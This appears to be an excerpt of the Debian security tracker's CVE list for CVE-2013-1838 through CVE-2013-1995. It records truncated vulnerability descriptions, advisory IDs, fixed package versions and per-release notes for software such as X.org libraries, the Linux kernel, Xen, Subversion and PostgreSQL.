CVE-2013-1995 (X.org libXi 1.7.1 and earlier allows X servers to trigger allocation o ...)
	{DSA-2683-1}
	- libxi 2:1.6.1-1+deb7u1
CVE-2013-1994 (Multiple integer overflows in X.org libchromeXvMC and libchromeXvMCPro ...)
	{DSA-2679-1}
	- xserver-xorg-video-openchrome 1:0.2.906-2+deb7u1
CVE-2013-1993 (Multiple integer overflows in X.org libGLX in Mesa 9.1.1 and earlier a ...)
	{DSA-2678-1}
	- mesa 8.0.5-6
CVE-2013-1992 (Multiple integer overflows in X.org libdmx 1.1.2 and earlier allow X s ...)
	{DSA-2673-1}
	- libdmx 1:1.1.2-1+deb7u1
CVE-2013-1991 (Multiple integer overflows in X.org libXxf86dga 1.1.3 and earlier allo ...)
	{DSA-2690-1}
	- libxxf86dga 2:1.1.3-2+deb7u1
CVE-2013-1990 (Multiple integer overflows in X.org libXvMC 1.0.7 and earlier allow X ...)
	{DSA-2675-1}
	- libxvmc 2:1.0.8-1
CVE-2013-1989 (Multiple integer overflows in X.org libXv 1.0.7 and earlier allow X se ...)
	{DSA-2674-1}
	- libxv 2:1.0.7-1+deb7u1
CVE-2013-1988 (Multiple integer overflows in X.org libXRes 1.0.6 and earlier allow X ...)
	{DSA-2688-1}
	- libxres 2:1.0.6-1+deb7u1
CVE-2013-1987 (Multiple integer overflows in X.org libXrender 0.9.7 and earlier allow ...)
	{DSA-2677-1}
	- libxrender 1:0.9.7-1+deb7u1
CVE-2013-1986 (Multiple integer overflows in X.org libXrandr 1.4.0 and earlier allow ...)
	{DSA-2684-1}
	- libxrandr 2:1.3.2-2+deb7u1
CVE-2013-1985 (Integer overflow in X.org libXinerama 1.1.2 and earlier allows X serve ...)
	{DSA-2691-1}
	- libxinerama 2:1.1.2-1+deb7u1
CVE-2013-1984 (Multiple integer overflows in X.org libXi 1.7.1 and earlier allow X se ...)
	{DSA-2683-1}
	- libxi 2:1.6.1-1+deb7u1
CVE-2013-1983 (Integer overflow in X.org libXfixes 5.0 and earlier allows X servers t ...)
	{DSA-2676-1}
	- libxfixes 1:5.0-4+deb7u1
CVE-2013-1982 (Multiple integer overflows in X.org libXext 1.3.1 and earlier allow X ...)
	{DSA-2682-1}
	- libxext 2:1.3.1-2+deb7u1
CVE-2013-1981 (Multiple integer overflows in X.org libX11 1.5.99.901 (1.6 RC1) and ea ...)
	{DSA-2693-1}
	- libx11 2:1.5.0-1+deb7u1
CVE-2013-1980 (Buffer overflow in the get_dsmp function in loaders/masi_load.c in lib ...)
	- xmp 3.4.0-3 (low; bug #706667)
	[wheezy] - xmp (Minor issue)
	[squeeze] - xmp (Minor issue)
CVE-2013-1979 (The scm_set_cred function in include/net/scm.h in the Linux kernel bef ...)
	{DSA-2669-1}
	- linux 3.8.11-1
	- linux-2.6 (Introduced in 2.6.36)
CVE-2013-1978 (Heap-based buffer overflow in the read_xwd_cols function in file-xwd.c ...)
	{DSA-2813-1}
	- gimp 2.8.10-0.1 (bug #731305)
CVE-2013-1977 (OpenStack devstack uses world-readable permissions for keystone.conf, ...)
	- keystone (permissions to /etc/keystone/keystone.conf restricted in postinst)
	NOTE: https://www.openwall.com/lists/oss-security/2013/04/19/2
CVE-2013-1976 (The (1) tomcat5, (2) tomcat6, and (3) tomcat7 init scripts, as used in ...)
	- tomcat6 (RedHat-specific issue)
	- tomcat7 (RedHat-specific issue)
CVE-2013-1975 RESERVED
CVE-2013-1974 RESERVED
CVE-2013-1973 (The autocomplete callback in Autocomplete Widgets for Text and Number ...)
	NOT-FOR-US: Drupal contributed module
CVE-2013-1972 (Cross-site request forgery (CSRF) vulnerability in the elFinder file m ...)
	NOT-FOR-US: Drupal contributed module
CVE-2013-1971 (Cross-site scripting (XSS) vulnerability in the MP3 Player module for ...)
	NOT-FOR-US: Drupal contributed module
CVE-2013-1970 REJECTED
CVE-2013-1969 (Multiple use-after-free vulnerabilities in libxml2 2.9.0 and possibly ...)
	- libxml2 (Affecting only 2.9.x, see bug #705722)
	NOTE: https://git.gnome.org/browse/libxml2/commit/?id=de0cc20c29cb3f056062925395e0f68d2250a46f
CVE-2013-1968 (Subversion before 1.6.23 and 1.7.x before 1.7.10 allows remote authent ...)
	{DSA-2703-1}
	- subversion 1.7.9-1+nmu2 (bug #711033)
	NOTE: https://subversion.apache.org/security/CVE-2013-1968-advisory.txt
CVE-2013-1967 (Cross-site scripting (XSS) vulnerability in flashmediaelement.swf in M ...)
	- owncloud (Vulnerable code not present)
	NOTE: oC >= 4.5 only
CVE-2013-1966 (Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arb ...)
	- libstruts1.2-java (Only affects Struts 2)
CVE-2013-1965 (Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 b ...)
	- libstruts1.2-java (Only affects Struts 2)
CVE-2013-1964 (Xen 4.0.x and 4.1.x incorrectly releases a grant reference when releas ...)
	{DSA-2666-1}
	- xen 4.1.4-3
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00006.html
CVE-2013-1963 (The contacts application in ownCloud before 4.5.10 and 5.x before 5.0. ...)
	- owncloud (Vulnerable code not present)
	NOTE: oC >= 4.5 only
CVE-2013-1962 (The remoteDispatchStoragePoolListAllVolumes function in the storage po ...)
	- libvirt (Vulnerable code not present)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=ca697e90d5bd6a6dfb94bfb6d4438bdf9a44b739
CVE-2013-1961 (Stack-based buffer overflow in the t2p_write_pdf_page function in tiff ...)
	{DSA-2698-1 DLA-610-1}
	- tiff 4.0.2-6+nmu1 (bug #706674)
	- tiff3 3.9.7-1 (bug #712840)
CVE-2013-1960 (Heap-based buffer overflow in the t2p_process_jpeg_strip function in t ...)
{DSA-2698-1} - tiff 4.0.2-6+nmu1 (bug #706675) - tiff3 (tiff command line tools not built in tiff3) CVE-2013-1959 (kernel/user_namespace.c in the Linux kernel before 3.8.9 does not have ...) - linux 3.8.11-1 [wheezy] - linux (Introduced in 3.7) - linux-2.6 (Introduced in 3.7) CVE-2013-1958 (The scm_check_creds function in net/core/scm.c in the Linux kernel bef ...) - linux 3.8.13-1 [wheezy] - linux (Not exploitable by unprivileged users) - linux-2.6 (Not exploitable by unprivileged users) CVE-2013-1957 (The clone_mnt function in fs/namespace.c in the Linux kernel before 3. ...) - linux 3.8.13-1 [wheezy] - linux (Not exploitable by unprivileged users) - linux-2.6 (Not exploitable by unprivileged users) CVE-2013-1956 (The create_user_ns function in kernel/user_namespace.c in the Linux ke ...) - linux 3.8.11-1 [wheezy] - linux (Not exploitable by unprivileged users) - linux-2.6 (Not exploitable by unprivileged users) CVE-2013-1955 (Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php a ...) NOT-FOR-US: Easy PHP Calendar CVE-2013-1954 (The ASF Demuxer (modules/demux/asf/asf.c) in VideoLAN VLC media player ...) {DSA-2973-1} - vlc 2.0.6-1 (bug #705136) [squeeze] - vlc (Unsupported in squeeze-lts) NOTE: http://www.videolan.org/security/sa1302.html CVE-2013-1953 (Integer underflow in the input_bmp_reader function in input-bmp.c in A ...) - autotrace 0.31.1-16+nmu1 (low; bug #742873) [wheezy] - autotrace (Minor issue) [squeeze] - autotrace (Minor issue) - gimp 2.6.10-1 NOTE: Gimp was fixed earlier, but only Squeeze version was checked NOTE: In gimp code introduced with d9c6f88141aecf956c5d721168f795de0e3027b8 NOTE: and fixed with 57f805a159874107c6c98065f9aa648c3634b8fd NOTE: https://git.gnome.org/browse/gimp/commit/?h=d9c6f88141aecf956c5d7 NOTE: https://git.gnome.org/browse/gimp/commit/?h=57f805a159874107c6c98 CVE-2013-1952 (Xen 4.x, when using Intel VT-d for a bus mastering capable PCI device, ...) 
{DSA-2666-1} - xen 4.1.4-4 CVE-2013-1951 (A cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.5 ...) - mediawiki 1:1.19.5-1 [squeeze] - mediawiki CVE-2013-1950 (The svc_dg_getargs function in libtirpc 0.2.3 and earlier allows remot ...) - libtirpc (regression code not present) NOTE: Regression introduced with 82cc2e6129c872c8be09381055f2fb5641c5e6fe NOTE: Regression fixed with a9f437119d79a438cb12e510f3cadd4060102c9f NOTE: https://www.openwall.com/lists/oss-security/2013/04/22/9 CVE-2013-1949 (Social Media Widget (social-media-widget) plugin 4.0 for WordPress con ...) NOT-FOR-US: Wordpress Social Media Widget CVE-2013-1948 (converter.rb in the md2pdf gem 0.0.1 for Ruby allows context-dependent ...) NOT-FOR-US: Ruby gem md2pdf CVE-2013-1947 (kelredd-pruview gem 0.3.8 for Ruby allows context-dependent attackers ...) NOT-FOR-US: Ruby Gem kelredd-pruview CVE-2013-1946 (The RESTful Web Services (RESTWS) module 7.x-1.x before 7.x-1.3 and 7. ...) NOT-FOR-US: RESTful Web Services (RESTWS) Drupal contributed module CVE-2013-1945 (ruby193 uses an insecure LD_LIBRARY_PATH setting. ...) NOT-FOR-US: Red Hat specific packaging flaw of Ruby in Red Hat OpenShift Enterprise CVE-2013-1944 (The tailMatch function in cookie.c in cURL and libcurl before 7.30.0 d ...) {DSA-2660-1} - curl 7.29.0-2.1 (bug #705274) [wheezy] - curl 7.26.0-1+wheezy2 NOTE: http://curl.haxx.se/docs/adv_20130412.html CVE-2013-1943 (The KVM subsystem in the Linux kernel before 3.0 does not check whethe ...) - linux (RHEL-specific backport regression) - linux-2.6 (RHEL-specific backport regression) CVE-2013-1942 (Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jp ...) 
- owncloud (Depends on libjs-jquery-jplayer) - jquery-jplayer 2.1.0-2 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-014/ NOTE: https://github.com/happyworm/jPlayer/commit/e8ca190f7f972a6a421cb95f09e138720e40ed6d CVE-2013-1941 (The installation routine in ownCloud Server before 4.0.14, 4.5.x befor ...) - owncloud 5.0.4~rc1+dfsg-1 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-015/ CVE-2013-1940 (X.Org X server before 1.13.4 and 1.4.x before 1.14.1 does not properly ...) {DSA-2661-1} - xorg-server 2:1.12.4-6 CVE-2013-1939 (The HTML\Browser plugin in SabreDAV before 1.6.9, 1.7.x before 1.7.7, ...) - owncloud (Windows version only) - php-sabredav (running in Windows hosts) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-016/ CVE-2013-1938 (Zimbra 2013 has XSS in aspell.php ...) NOT-FOR-US: Zimbra CVE-2013-1937 (** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in ...) - phpmyadmin (Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable) NOTE: http://seclists.org/fulldisclosure/2013/Apr/100 NOTE: https://github.com/phpmyadmin/phpmyadmin/commit/79089c9bc02c82c15419fd9d6496b8781ae08a5a CVE-2013-1936 REJECTED CVE-2013-1935 (A certain Red Hat patch to the KVM subsystem in the kernel package bef ...) - linux (RHEL-specific backport regression) - linux-2.6 (RHEL-specific backport regression) CVE-2013-1934 (A cross-site scripting (XSS) vulnerability in the configuration report ...) {DSA-3120-1} - mantis (low; bug #717482) [squeeze] - mantis (Unsupported in squeeze-lts) CVE-2013-1933 (The extract_from_ocr function in lib/docsplit/text_extractor.rb in the ...) NOT-FOR-US: Karteek Docsplit Ruby Gem CVE-2013-1932 (A cross-site scripting (XSS) vulnerability in the configuration report ...) - mantis (affects Mantis 1.2.13 only) NOTE: https://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1931 (A cross-site scripting (XSS) vulnerability in MantisBT 1.2.14 allows r ...) 
- mantis (affects Mantis 1.2.14 only) NOTE: https://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1930 (MantisBT 1.2.12 before 1.2.15 allows authenticated users to by the wor ...) - mantis (affects only Mantis 1.2.12 and later) NOTE: https://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1929 (Heap-based buffer overflow in the tg3_read_vpd function in drivers/net ...) {DSA-2669-1 DSA-2668-1} - linux 3.8.11-1 - linux-2.6 CVE-2013-1928 (The do_video_set_spu_palette function in fs/compat_ioctl.c in the Linu ...) {DSA-2668-1} - linux 3.2.35-1 - linux-2.6 CVE-2013-1927 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 allows remo ...) - icedtea-web 1.3.2-1 CVE-2013-1926 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 uses the sa ...) - icedtea-web 1.3.2-1 CVE-2013-1925 (The Chaos Tool Suite (ctools) module 7.x-1.x before 7.x-1.3 for Drupal ...) NOT-FOR-US: CTools module for Drupal CVE-2013-1924 (Commerce Skrill (Formerly Moneybookers) has an Access bypass vulnerabi ...) NOT-FOR-US: Commerce Skrill Drupal module CVE-2013-1923 (rpc-gssd in nfs-utils before 1.2.8 performs reverse DNS resolution for ...) - nfs-utils 1:1.2.8-1 (low; bug #707401) [squeeze] - nfs-utils (Minor issue) [wheezy] - nfs-utils 1:1.2.6-4 CVE-2013-1922 (qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw ...) - xen (qemu-nbd-xen built, but not installed into the binary packages) - qemu 1.5.0+dfsg-1 (low; bug #705544) [squeeze] - qemu (Minor issue) [wheezy] - qemu (Minor issue) - xen-qemu-dm-4.0 (qemu-nbd not installed by the binary package) CVE-2013-1921 (PicketBox, as used in Red Hat JBoss Enterprise Application Platform be ...) NOT-FOR-US: Red Hat JBoss Enterprise Application Platform (Debian's jboss only provides some classes) CVE-2013-1920 (Xen 4.2.x, 4.1.x, and earlier, when the hypervisor is running "under m ...) 
- xen (XSM not enabled in build) NOTE: Debian package not built with XSM_ENABLE, thus the resulting binary packages are not affected CVE-2013-1919 (Xen 4.2.x and 4.1.x does not properly restrict access to IRQs, which a ...) {DSA-2662-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00003.html CVE-2013-1918 (Certain page table manipulation operations in Xen 4.1.x, 4.2.x, and ea ...) {DSA-2666-1} - xen 4.1.4-4 CVE-2013-1917 (Xen 3.1 through 4.x, when running 64-bit hosts on Intel CPUs, does not ...) {DSA-2662-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00005.html CVE-2013-1916 RESERVED NOT-FOR-US: WordPress plugin CVE-2013-1915 (ModSecurity before 2.7.3 allows remote attackers to read arbitrary fil ...) {DSA-2659-1} - modsecurity-apache 2.6.6-6 (bug #704625) - libapache-mod-security NOTE: https://github.com/SpiderLabs/ModSecurity/commit/d4d80b38aa85eccb26e3c61b04d16e8ca5de76fe NOTE: http://marc.info/?l=oss-security&m=136499182131283&w=2 CVE-2013-1914 (Stack-based buffer overflow in the getaddrinfo function in sysdeps/pos ...) {DLA-165-1} - eglibc - glibc 2.17-2 (low; bug #704623) [wheezy] - eglibc 2.13-38+deb7u1 CVE-2013-1913 (Integer overflow in the load_image function in file-xwd.c in the X Win ...) {DSA-2813-1} - gimp 2.8.10-0.1 (bug #731305) CVE-2013-1912 (Buffer overflow in HAProxy 1.4 through 1.4.22 and 1.5-dev through 1.5- ...) {DSA-2711-1} - haproxy 1.4.23-1 (bug #704611) NOTE: http://git.1wt.eu/web?p=haproxy-1.4.git;a=commitdiff;h=dc80672211 CVE-2013-1911 (lib/ldoce/word.rb in the ldoce 0.0.2 gem for Ruby allows remote attack ...) NOT-FOR-US: ldoce ruby gem CVE-2013-1910 (yum does not properly handle bad metadata, which allows an attacker to ...) 
- yum (unimportant) NOTE: http://yum.baseurl.org/gitweb?p=yum.git;a=commitdiff;h=c148eb10b798270b3d15087433c8efb2a79a69d0 NOTE: Only used for bootstraps of chroots, see README.Debian CVE-2013-1909 (The Python client in Apache Qpid before 2.2 does not verify that the s ...) - qpid-python 0.22-1 (low; bug #714133) [wheezy] - qpid-python (Minor issue) CVE-2013-1908 (The Commons Wikis module before 7.x-3.1 for Drupal, as used in the Com ...) NOT-FOR-US: Drupal module CVE-2013-1907 (The Commons Group module before 7.x-3.1 for Drupal, as used in the Com ...) NOT-FOR-US: Drupal module CVE-2013-1906 (Cross-site scripting (XSS) vulnerability in the Rules module 7.x-2.x b ...) NOT-FOR-US: Drupal module Rules CVE-2013-1905 (Cross-site scripting (XSS) vulnerability in the Zero Point theme 7.x-1 ...) NOT-FOR-US: Drupal theme Zero Point CVE-2013-1904 (Absolute path traversal vulnerability in steps/mail/sendmail.inc in Ro ...) - roundcube 0.7.2-9 [squeeze] - roundcube (Vulnerable code not present) CVE-2013-1903 (PostgreSQL, possibly 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x bef ...) - postgresql-9.1 (installer related) - postgresql-8.4 (installer related) CVE-2013-1902 (PostgreSQL, 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before 9.0.1 ...) - postgresql-9.1 (installer related) - postgresql-8.4 (installer related) CVE-2013-1901 (PostgreSQL 9.2.x before 9.2.4 and 9.1.x before 9.1.9 does not properly ...) {DSA-2658-1} - postgresql-9.1 9.1.9-1 CVE-2013-1900 (PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x before 9.0.13 ...) {DSA-2658-1 DSA-2657-1} - postgresql-9.1 9.1.9-1 - postgresql-8.4 8.4.17-1 CVE-2013-1899 (Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, 9.1 ...) {DSA-2658-1} - postgresql-9.1 9.1.9-1 (bug #704479) CVE-2013-1898 (lib/thumbshooter.rb in the Thumbshooter 0.1.5 gem for Ruby allows remo ...) NOT-FOR-US: Ruby gem Thumbshooter CVE-2013-1897 (The do_search function in ldap/servers/slapd/search.c in 389 Directory ...) 
- 389-ds-base 1.3.2.9-1 (bug #704421) NOTE: http://git.fedorahosted.org/cgit/389/ds.git/commit/?h=389-ds-base-1.2.11&id=5a18c828533a670e7143327893f8171a19062286 NOTE: https://fedorahosted.org/389/ticket/47308 CVE-2013-1896 (mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly de ...) - apache2 2.4.6-1 (low; bug #717272) [wheezy] - apache2 2.2.22-13+deb7u1 [squeeze] - apache2 2.2.16-6+squeeze12 NOTE: http://www.gossamer-threads.com/lists/apache/announce/427633 CVE-2013-1895 (The py-bcrypt module before 0.3 for Python does not properly handle co ...) - python-bcrypt 0.4-1 (bug #704030) [squeeze] - python-bcrypt (thread support only introduced after 0.1 release) NOTE: https://code.google.com/p/py-bcrypt/source/detail?r=b03cc5246ea21a839fd027da5616d8d470247558 CVE-2013-1894 REJECTED CVE-2013-1893 (SQL injection vulnerability in addressbookprovider.php in ownCloud Ser ...) - owncloud (only affecting 5.0 branch) CVE-2013-1892 (MongoDB before 2.0.9 and 2.2.x before 2.2.4 does not properly validate ...) - mongodb 1:2.4.1-1 (bug #704042) [wheezy] - mongodb 1:2.0.6-1.1 [squeeze] - mongodb (Minor issue, Spidermonkey in Lenny is EOLed) NOTE: https://www.openwall.com/lists/oss-security/2013/03/25/7 CVE-2013-1891 RESERVED CVE-2013-1890 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud Server ...) - owncloud (only affecting 5.0 branch) CVE-2013-1889 (mod_ruid2 before 0.9.8 improperly handles file descriptors which allow ...) - libapache2-mod-ruid2 0.9.8-1 (low; bug #704066) [wheezy] - libapache2-mod-ruid2 (Minor issue) NOTE: Fix: https://github.com/mind04/mod-ruid2/commit/1fed9dda70cd44d54301df19730a29ae0989e0a2 CVE-2013-1888 (pip before 1.3 allows local users to overwrite arbitrary files via a s ...) - python-pip [squeeze] - python-pip NOTE: https://github.com/pypa/pip/pull/780/files NOTE: Not-affected as vulnerable code only in 1.3, and 1.3.1-1 fixed the issue. 
CVE-2013-1887 (Multiple cross-site scripting (XSS) vulnerabilities in the Views modul ...) - drupal6 (only affects 7.x-3.x to 7.x-3.6) - drupal7 (views module not packaged) CVE-2013-1886 (Format string vulnerability in the token processing system (pki-tps) i ...) NOT-FOR-US: Red Hat Certificate System CVE-2013-1885 (Multiple cross-site scripting (XSS) vulnerabilities in the token proce ...) NOT-FOR-US: Red Hat Certificate System CVE-2013-1884 (The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through ...) - subversion 1.7.9-1 (bug #704940) [wheezy] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive)) [squeeze] - subversion (Subversion HTTPD servers 1.7.0 through 1.7.8 (inclusive)) NOTE: http://bugs.debian.org/704940#32 NOTE: http://subversion.apache.org/security/CVE-2013-1884-advisory.txt CVE-2013-1883 (Mantis Bug Tracker (aka MantisBT) 1.2.12 before 1.2.15 allows remote a ...) - mantis (only affects 1.2.12 to 1.2.14) NOTE: https://www.openwall.com/lists/oss-security/2013/03/21/3 CVE-2013-1882 RESERVED CVE-2013-1881 (GNOME libsvg before 2.39.0 allows remote attackers to read arbitrary f ...) - librsvg 2.40.0-1 (bug #724741) [wheezy] - librsvg 2.36.1-2 [squeeze] - librsvg 2.26.3-1+deb6u2 CVE-2013-1880 (Cross-site scripting (XSS) vulnerability in the Portfolio publisher se ...) - activemq (portfolio demo app not shipped in Debian package) NOTE: https://issues.apache.org/jira/browse/AMQ-4398 CVE-2013-1879 (Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache Ac ...) - activemq (scheduler not shipped in Debian package) NOTE: https://issues.apache.org/jira/browse/AMQ-4397 CVE-2013-1878 REJECTED CVE-2013-1877 REJECTED CVE-2013-1876 REJECTED CVE-2013-1875 (command_wrap.rb in the command_wrap Gem for Ruby allows remote attacke ...) NOT-FOR-US: ruby gem command_wrap CVE-2013-1874 (Untrusted search path vulnerability in csi in Chicken before 4.8.2 all ...) 
- chicken 4.8.0.3-1 (low; bug #702410) [squeeze] - chicken (Minor issue) [wheezy] - chicken (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/03/19/11 CVE-2013-1873 [linux kernel kernel stack memory disclosure] REJECTED CVE-2013-1872 (The Intel drivers in Mesa 8.0.x and 9.0.x allow context-dependent atta ...) {DSA-2704-1} - mesa 8.0.5-7 [squeeze] - mesa (Vulnerable code not present) CVE-2013-1871 (Cross-site scripting (XSS) vulnerability in account/EditAddress.do in ...) NOT-FOR-US: Red Hat Satellite CVE-2013-1870 REJECTED CVE-2013-1869 (CRLF injection vulnerability in spacewalk-java before 2.1.148-1 and Re ...) NOT-FOR-US: Red Hat Satellite CVE-2013-1868 (Multiple buffer overflows in VideoLAN VLC media player 2.0.4 and earli ...) {DSA-2973-1} - vlc 2.0.5-1 [squeeze] - vlc (Unsupported in squeeze-lts) NOTE: http://www.videolan.org/security/sa1301.html NOTE: The freetype issue is a harmless NULL deref and won't be fixed CVE-2013-1867 (Gemalto Tokend 2013 has an Arbitrary File Creation/Overwrite Vulnerabi ...) NOT-FOR-US: Gemalto Tokend CVE-2013-1866 (OpenSC OpenSC.tokend has an Arbitrary File Creation/Overwrite Vulnerab ...) NOT-FOR-US: OpenSC.tokend (different from src:opensc) CVE-2013-1865 (OpenStack Keystone Folsom (2012.2) does not properly perform revocatio ...) - keystone (only affects folsom) NOTE: fixed in experimental with keystone/2012.2.3-2 CVE-2013-1864 (The Portable Tool Library (aka PTLib) before 2.10.10, as used in Ekiga ...) NOTE: https://www.openwall.com/lists/oss-security/2013/03/15/6 - ekiga 4.0.1-1 (low; bug #704133) [wheezy] - ekiga (Minor issue) [squeeze] - ekiga (Minor issue) CVE-2013-1863 (Samba 4.x before 4.0.4, when configured as an Active Directory domain ...) - samba4 (Debian package only uses ntvfs, see #679678) NOTE: http://www.samba.org/samba/history/samba-4.0.4.html NOTE: http://www.samba.org/samba/security/CVE-2013-1863 CVE-2013-1862 (mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2. ...) 
- apache2 2.4.1-1 (unimportant) [wheezy] - apache2 2.2.22-13+deb7u1 [squeeze] - apache2 2.2.16-6+squeeze12 NOTE: Such injection issues are not treated as security issues CVE-2013-1861 (MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, ...) {DSA-2818-1 DSA-2780-1} - mariadb-5.5 (Fixed before initial upload to archive) - mariadb-10.0 (Fixed before initial upload) - mysql-5.5 5.5.33+dfsg-1 (low; bug #706715) - mysql-5.1 (low; bug #706715) NOTE: https://mariadb.atlassian.net/browse/MDEV-4252 CVE-2013-1860 (Heap-based buffer overflow in the wdm_in_callback function in drivers/ ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1859 (The Node Parameter Control module 6.x-1.x for Drupal does not properly ...) NOT-FOR-US: Drupal module Node Parameter Control CVE-2013-1858 (The clone system-call implementation in the Linux kernel before 3.8.3 ...) - linux (Only exploitable starting with 3.7) - linux-2.6 (Only exploitable starting with 3.7) NOTE: http://stealth.openwall.net/xSports/clown-newuser.c CVE-2013-1857 (The sanitize helper in lib/action_controller/vendor/html-scanner/html/ ...) {DSA-2655-1} - ruby-actionpack-3.2 3.2.6-6 (bug #703349) - ruby-actionpack-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1856 (The ActiveSupport::XmlMini_JDOM backend in lib/active_support/xml_mini ...) - ruby-activesupport-2.3 (Only affects 3.x and later) - ruby-activesupport-3.2 3.2.6-6 (bug #703350) - rails (Only affects 3.x and later) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1855 (The sanitize_css method in lib/action_controller/vendor/html-scanner/h ...) {DSA-2655-1} - ruby-actionpack-3.2 3.2.6-6 (bug #703349) - ruby-actionpack-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1854 (The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1. ...) 
{DSA-2655-1} - ruby-activerecord-3.2 3.2.6-5 (bug #703348) - ruby-activerecord-2.3 2.3.14-6 - ruby-activesupport-2.3 2.3.14-7 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-1853 (Almanah Diary 0.9.0 and 0.10.0 does not encrypt the database when clos ...) - almanah 0.9.1-1 (bug #702905) [squeeze] - almanah (Only affect Almanah used in combination with glib 2.32) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=695117 CVE-2013-1852 (SQL injection vulnerability in leaguemanager.php in the LeagueManager ...) NOT-FOR-US: WordPress plugin LeagueManager CVE-2013-1851 (Incomplete blacklist vulnerability in lib/migrate.php in ownCloud befo ...) - owncloud 4.0.8debian-1.6 (bug #703094) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-010/ NOTE: https://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1850 (Multiple incomplete blacklist vulnerabilities in (1) import.php and (2 ...) - owncloud 4.0.8debian-1.6 (bug #703094) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-009/ NOTE: https://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1849 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://seclists.org/fulldisclosure/2013/Mar/56 CVE-2013-1848 (fs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect argume ...) - linux 3.2.41-1 - linux-2.6 [squeeze] - linux-2.6 (Introduced in 2.6.33) NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/8 CVE-2013-1847 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1847-advisory.txt CVE-2013-1846 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...) 
{DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1846-advisory.txt CVE-2013-1845 (The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before ...) {DLA-207-1} - subversion 1.7.9-1 (bug #704940) [squeeze] - subversion (Minor issue) [wheezy] - subversion 1.6.17dfsg-4+deb7u2 NOTE: http://subversion.apache.org/security/CVE-2013-1845-advisory.txt CVE-2013-1844 (Cross-site scripting (XSS) vulnerability in Piwik before 1.11 allows r ...) - piwik (bug #506933) CVE-2013-1843 (Open redirect vulnerability in the Access tracking mechanism in TYPO3 ...) {DSA-2646-1} - typo3-src 4.5.19+dfsg1-5 (bug #702574) CVE-2013-1842 (SQL injection vulnerability in the Extbase Framework in TYPO3 4.5.x be ...) {DSA-2646-1} - typo3-src 4.5.19+dfsg1-5 (bug #702574) CVE-2013-1841 (Net-Server, when the reverse-lookups option is enabled, does not check ...) - libnet-server-perl (low; bug #702914) [bullseye] - libnet-server-perl (Minor issue) [buster] - libnet-server-perl (Minor issue) [stretch] - libnet-server-perl (Minor issue) [jessie] - libnet-server-perl (Minor issue) [wheezy] - libnet-server-perl (Minor issue) [squeeze] - libnet-server-perl (Minor issue) NOTE: https://rt.cpan.org/Ticket/Display.html?id=83909 CVE-2013-1840 (The v1 API in OpenStack Glance Essex (2012.1), Folsom (2012.2), and Gr ...) - glance 2012.1.1-5 (bug #703063) CVE-2013-1839 (The strHdrAcptLangGetItem function in errorpage.cc in Squid 3.2.x befo ...) - squid3 (the errors were introduced in trunk rev.11496 in 3.2.0.9) NOTE: According to http://seclists.org/bugtraq/2013/Mar/68 not affecting 3.1? NOTE: http://bazaar.launchpad.net/~squid/squid/3.2/revision/11796 CVE-2013-1838 (OpenStack Compute (Nova) Grizzly, Folsom (2012.2), and Essex (2012.1) ...) 
